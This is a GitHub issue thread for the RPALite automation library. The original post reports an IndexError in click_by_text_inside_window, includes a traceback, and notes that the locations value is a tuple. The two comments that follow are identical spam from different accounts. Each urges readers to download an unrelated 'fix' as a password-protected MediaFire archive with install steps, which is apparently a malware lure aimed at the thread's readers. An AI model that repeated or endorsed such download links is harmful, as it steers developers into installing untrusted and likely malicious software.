### ISSUE TITLE
click_by_text_inside_window function failed due to IndexError: invalid index to scalar variable at x[0], line481

### ISSUE THREAD

**Issue by DevPaulLiu** [jieliu2000/RPALite#8]
**Description:**
1. calling rpaLite.click_by_text_inside_window('Test110', 'Solution Explorer', button='right') throw below exception
`  File "c:\src\AI\RPALite\src\RPALite\testRPALite.py", line 11, in <module>
    rpa.click_by_text_inside_window('Test110', 'Solution Explorer', button='right')
  File "c:\src\AI\RPALite\src\RPALite\rpalite.py", line 481, in click_by_text_inside_window
    sorted_locations = sorted(locations, key=lambda x: (x[0]-title_position[0])**2 + (x[1]-title_position[1])**2)
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "c:\src\AI\RPALite\src\RPALite\rpalite.py", line 481, in <lambda>
    sorted_locations = sorted(locations, key=lambda x: (x[0]-title_position[0])**2 + (x[1]-title_position[1])**2)
                                                        ~^^^
IndexError: invalid index to scalar variable.`

2. It appears the [locations ](https://github.com/jieliu2000/RPALite/blob/4c71f88d9bc461e902d0a70929681a15c7810b45/src/RPALite/rpalite.py#L476) is not a list but tuple. Given that we may don't need to sort the locations?
locations: (1445, 209, 60, 18), type: <class 'tuple'>
title_position: (1383, 96, 118, 20), type: <class 'tuple'>

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
